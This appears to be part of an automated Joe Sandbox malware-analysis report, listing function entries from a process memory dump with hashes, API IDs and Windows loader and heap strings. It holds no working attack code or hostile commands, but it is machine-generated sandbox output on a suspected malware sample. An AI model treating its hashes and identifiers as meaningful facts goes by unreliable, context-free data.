                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 3446177414-3589223738
                                                                      • Opcode ID: 09721a73ee258f42f3e1a9357298fa003c5efa88dd195762a475d64aa6b40dc1
                                                                      • Instruction ID: 7c348d434b845ca1d71c477a7a85105122816916ab85d7f2892f7fedd2cac1b9
                                                                      • Opcode Fuzzy Hash: 09721a73ee258f42f3e1a9357298fa003c5efa88dd195762a475d64aa6b40dc1
                                                                      • Instruction Fuzzy Hash: F751E136E10358ABDB08EFA8CC64E9D7BB6AB40348F150165EA40BF296DB749C51CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                      • API String ID: 3446177414-3224558752
                                                                      • Opcode ID: efbdf8ebd6b1670b6b3f99cc7d80324e8f6ab4a1f82cd363beb0e1b352e23106
                                                                      • Instruction ID: e5cfa9f0cb438e858c6dbc1437567b120c6cd87c608e8c4361352d23e041b0dd
                                                                      • Opcode Fuzzy Hash: efbdf8ebd6b1670b6b3f99cc7d80324e8f6ab4a1f82cd363beb0e1b352e23106
                                                                      • Instruction Fuzzy Hash: B6412674A14760DFE712DF24C954B6ABBB8FF403A4F2085A9D90557281CB78D980DF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • ---------------------------------------, xrefs: 36B8EDF9
                                                                      • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 36B8EDE3
                                                                      • Entry Heap Size , xrefs: 36B8EDED
                                                                      • HEAP: , xrefs: 36B8ECDD
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                      • API String ID: 3446177414-1102453626
                                                                      • Opcode ID: cf3162690479afd73e16276cfeaee8e345a90f1897df5abe09332111e784a243
                                                                      • Instruction ID: 20b9591cc1edc67406449172401c7e22e71e7a1a25065c77777b1132c69857bf
                                                                      • Opcode Fuzzy Hash: cf3162690479afd73e16276cfeaee8e345a90f1897df5abe09332111e784a243
                                                                      • Instruction Fuzzy Hash: 17418D79E10262DFC704CF14C9A0959BBB6FF853947258069D504AF221DB31EC43CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                      • API String ID: 3446177414-1222099010
                                                                      • Opcode ID: a2aa23e6af043cfc70012c291f81dc25b1483e72a8c8b9ae24a7f23b4a2a507d
                                                                      • Instruction ID: 406ee50daa462f4954e30db7c1834d908338c91075069e0150d60db248b1664b
                                                                      • Opcode Fuzzy Hash: a2aa23e6af043cfc70012c291f81dc25b1483e72a8c8b9ae24a7f23b4a2a507d
                                                                      • Instruction Fuzzy Hash: 6A3141759107A4AFEB12DB24C818F697FF8FF01694F004889E8014B6A1CB69E940CF52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: $$@
                                                                      • API String ID: 3446177414-1194432280
                                                                      • Opcode ID: 55947e1b892933edf373ebe5eaf8e770ca7e1ad5687f7079ab0f0501d3bef93f
                                                                      • Instruction ID: b5a47d8e6f9a520d09c8bc438c123b8bb7d7453aa1a1671ee8e7468bbf69ff3b
                                                                      • Opcode Fuzzy Hash: 55947e1b892933edf373ebe5eaf8e770ca7e1ad5687f7079ab0f0501d3bef93f
                                                                      • Instruction Fuzzy Hash: 5B8139B1D002699BDB22DF54CC44BDEB7B8AF08750F0041EAEA09B7240E7709E85DFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 36B53439
                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 36B5344A, 36B53476
                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 36B53466
                                                                      • LdrpFindDllActivationContext, xrefs: 36B53440, 36B5346C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                      • API String ID: 3446177414-3779518884
                                                                      • Opcode ID: 8a487727bd23e2e7a82d76ccdb2ed4f2b04127cf25f3f016c88792f62b4ea991
                                                                      • Instruction ID: 9f5e1324d58866f088d87fed2a8a29e414cf559422beddd71f0118e96bbd3e8b
                                                                      • Opcode Fuzzy Hash: 8a487727bd23e2e7a82d76ccdb2ed4f2b04127cf25f3f016c88792f62b4ea991
                                                                      • Instruction Fuzzy Hash: F23119BAD00371BFFB119B05C884A56B6A4FB013D8F529166DA0467151E7A59CC8CFF1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • LdrpDynamicShimModule, xrefs: 36B4A7A5
                                                                      • apphelp.dll, xrefs: 36B02382
                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 36B4A79F
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 36B4A7AF
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-176724104
                                                                      • Opcode ID: 9b061c3066e65554ac11fd9a55debfb5638b2bef0e40051e565791883713a41f
                                                                      • Instruction ID: ead2f91d8c868822e677be7235e15d125a1246fdea11346df405e9836257680d
                                                                      • Opcode Fuzzy Hash: 9b061c3066e65554ac11fd9a55debfb5638b2bef0e40051e565791883713a41f
                                                                      • Instruction Fuzzy Hash: 2E316B76E00250EFF721AF19CC91E597BB6FB85744F240059EA00BB255EBB99C42DFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                      • API String ID: 3446177414-3610490719
                                                                      • Opcode ID: 56a83fc848b1d0a469113c8aa41db632e0db63452b0bdbd6a33f8e5d639446ba
                                                                      • Instruction ID: 4f5a53ffd06ee4c698407b39568aff0d9117c1e07f5142619eb0a28cfe08fa21
                                                                      • Opcode Fuzzy Hash: 56a83fc848b1d0a469113c8aa41db632e0db63452b0bdbd6a33f8e5d639446ba
                                                                      • Instruction Fuzzy Hash: 4F91FE71B05760AFE315CF24CDB4B6BB7A9FF84A44F21045AED449B281DB34E842CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • Failed to allocated memory for shimmed module list, xrefs: 36B49F1C
                                                                      • LdrpCheckModule, xrefs: 36B49F24
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 36B49F2E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 3446177414-161242083
                                                                      • Opcode ID: 894f2972a442a3346fc8d7b0da16e1a2f01e880fc1cc7a46c98f3233ea75aec1
                                                                      • Instruction ID: 2f3b1077676b0e0147c6ad089497e6322c2aa306a2a9ff8cb4a0fbb61887dfd9
                                                                      • Opcode Fuzzy Hash: 894f2972a442a3346fc8d7b0da16e1a2f01e880fc1cc7a46c98f3233ea75aec1
                                                                      • Instruction Fuzzy Hash: 9071E175E102159FEB05EF68C990AAEBBF5FB44308F144069E905EB251E734AD42CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: $File
                                                                      • API String ID: 3446177414-2412145507
                                                                      • Opcode ID: 8d95f6efa31b43bf57e4ef5524226a36c77670fd4f82e1755b28055e20b668cd
                                                                      • Instruction ID: c2a1476d5c8ec2b7c55ee2d647f2eb02a3edb34e1eb75cdc4a2de4cc1968272e
                                                                      • Opcode Fuzzy Hash: 8d95f6efa31b43bf57e4ef5524226a36c77670fd4f82e1755b28055e20b668cd
                                                                      • Instruction Fuzzy Hash: 20619E71A1022DAFDF268B25CC51FE977F9AB48700F4041E9A54AE7181DB709F84CF54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 36B580E9
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 36B580F3
                                                                      • Failed to reallocate the system dirs string !, xrefs: 36B580E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 3446177414-1783798831
                                                                      • Opcode ID: 85aed5869689088010ca49cfa8aeed2aa79cd51325425ebaaff0e5ced4958555
                                                                      • Instruction ID: 0f0fa455bf6fe8b8c80cbe74fb1d02bbb02086e269a4ce47bad82c7050c1ff21
                                                                      • Opcode Fuzzy Hash: 85aed5869689088010ca49cfa8aeed2aa79cd51325425ebaaff0e5ced4958555
                                                                      • Instruction Fuzzy Hash: B741F0B5914324ABD710EF64CD51F9B7BF9EB45750F01582ABA48EB290EB38D801CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 36B64519
                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 36B64508
                                                                      • LdrpCheckRedirection, xrefs: 36B6450F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                      • API String ID: 3446177414-3154609507
                                                                      • Opcode ID: a0e6d3c4193293488d6e49d41de3c34837c0a5c4ded23b7cab5b6558d0c4dd0f
                                                                      • Instruction ID: 79765938d6b5d6cedca6f04dc300f585f4aa8f2bc13471d37578c2bb85f66aba
                                                                      • Opcode Fuzzy Hash: a0e6d3c4193293488d6e49d41de3c34837c0a5c4ded23b7cab5b6558d0c4dd0f
                                                                      • Instruction Fuzzy Hash: 6B410176A04B219BDB10CF6BC841A1677E4FF48798F058659ED88EB211DF70E800CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: Wow64 Emulation Layer
                                                                      • API String ID: 3446177414-921169906
                                                                      • Opcode ID: 68450a560aa3f9503adfd21c35f10cc497b315c1cba57950791eb82eec73a1ac
                                                                      • Instruction ID: ba556baf58884f42b5c6bafb0c999281742edc672f99b069803a1bc320083f20
                                                                      • Opcode Fuzzy Hash: 68450a560aa3f9503adfd21c35f10cc497b315c1cba57950791eb82eec73a1ac
                                                                      • Instruction Fuzzy Hash: 2721F97690011EBFAF01AAA28D84DFFBF7DEF45699B440054FE02A6101E635EE11DF61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      • Opcode ID: 58dff58cbf817e90b44692bd79008522d8935062181c183a1b4f3dd5ea8db9e6
                                                                      • Instruction ID: 1ca1be56a8a854a099d8e76e3f24e733ff326bf771675562a2e8e83696e71086
                                                                      • Opcode Fuzzy Hash: 58dff58cbf817e90b44692bd79008522d8935062181c183a1b4f3dd5ea8db9e6
                                                                      • Instruction Fuzzy Hash: 0BE15D71E00319AFEF10CFA5C894BAEBBB9EF04354F20412AE955EB280D7709A45CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 60da533331051b2c82f27cb5d3876fb285af0ff54ffb4b53f5efe16f7fb7b6b8
                                                                      • Instruction ID: 8e3205c8e995bf16edf0c8a10b1323eff714ca75cc16c4f599bab60151969d39
                                                                      • Opcode Fuzzy Hash: 60da533331051b2c82f27cb5d3876fb285af0ff54ffb4b53f5efe16f7fb7b6b8
                                                                      • Instruction Fuzzy Hash: 9BE1DFB4E10228DFEB25CFA9C980A9DBFF9FF48344F20552AE955A7220D771A841CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      • Opcode ID: b41a7ae8cf1442d040dd37fa026155824206577691b7c669b11929b8445502c7
                                                                      • Instruction ID: 165d9d982b164a9219f5dc5c942f9a28e526d040196e69fb4b3542f497166acf
                                                                      • Opcode Fuzzy Hash: b41a7ae8cf1442d040dd37fa026155824206577691b7c669b11929b8445502c7
                                                                      • Instruction Fuzzy Hash: 21514A74F10632DFEF48CE19C8A0A29BBE6FB8A354B644169D506DB750DBB5AC41CF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      • Opcode ID: 47c7c82798cc070a1cef0c0659f86ca88942b5aa8ec157355bc742f4a0fefaa4
                                                                      • Instruction ID: 3955a86f710b8a8a7e054e93b98f635677e98594522c17322d2b972c0592b8ce
                                                                      • Opcode Fuzzy Hash: 47c7c82798cc070a1cef0c0659f86ca88942b5aa8ec157355bc742f4a0fefaa4
                                                                      • Instruction Fuzzy Hash: 945135B5E102299FEF04CF95D844ADDBBB6FF48354F16802AEA05BB250DB349902CF54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                      • String ID:
                                                                      • API String ID: 4281723722-0
                                                                      • Opcode ID: 4d149c70221ec37620b690cd5772188287da4726021f9b8c79d73614ebb1ed25
                                                                      • Instruction ID: d5c1e897fe005e97b15c44f0e2df1a308982b0cf8886e23ff59438a2d0a73895
                                                                      • Opcode Fuzzy Hash: 4d149c70221ec37620b690cd5772188287da4726021f9b8c79d73614ebb1ed25
                                                                      • Instruction Fuzzy Hash: 21312775E01228EFCF05DFA9D854A9DBBF1FB48320F10416AEA11BB280DB395901CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      • Opcode ID: 4a1ea342ed20c6f8edfde7d643959586c4c78336c99fcad6c4bece8361894edf
                                                                      • Instruction ID: 940a8b9455095e20635429fc44fa6698664d1bc72d5a4730ce01a421955155b9
                                                                      • Opcode Fuzzy Hash: 4a1ea342ed20c6f8edfde7d643959586c4c78336c99fcad6c4bece8361894edf
                                                                      • Instruction Fuzzy Hash: 05322474D14269DFEB21CF64C984BD9BBB0BF08304F1041E9D949AB241EB769A84DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • kLsE, xrefs: 36AE05FE
                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 36AE0586
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                      • API String ID: 3446177414-2547482624
                                                                      • Opcode ID: b4897158580748721cd89b9d3dd8ace95f4fda971454629e27c5e592c7b420ad
                                                                      • Instruction ID: 007f86608d52b18dbdc18dc7205aa0f623e4de49f29cf39ddd03ecf206b9e908
                                                                      • Opcode Fuzzy Hash: b4897158580748721cd89b9d3dd8ace95f4fda971454629e27c5e592c7b420ad
                                                                      • Instruction Fuzzy Hash: 5D51DFB5A00706DFEB10DFA5C8807ABB7F8AF44304F10853ED9999B240EB749555DFA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: 0$0
                                                                      • API String ID: 3446177414-203156872
                                                                      • Opcode ID: cc2cc30ba9d1e169cedb4910a2ba6d442316c67b2e16e6036a992ea88c9163a1
                                                                      • Instruction ID: 2cc1e9a04ed4e88e0e14ae047a9dcec138a81e282797c5111ca12782025323b6
                                                                      • Opcode Fuzzy Hash: cc2cc30ba9d1e169cedb4910a2ba6d442316c67b2e16e6036a992ea88c9163a1
                                                                      • Instruction Fuzzy Hash: 164139B5A087019FD300CF28C954A5ABBE5BF8C354F144A6EF988DB240D771EA05CF96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:2.7%
                                                                      Dynamic/Decrypted Code Coverage:4.2%
                                                                      Signature Coverage:0.7%
                                                                      Total number of Nodes:453
                                                                      Total number of Limit Nodes:77
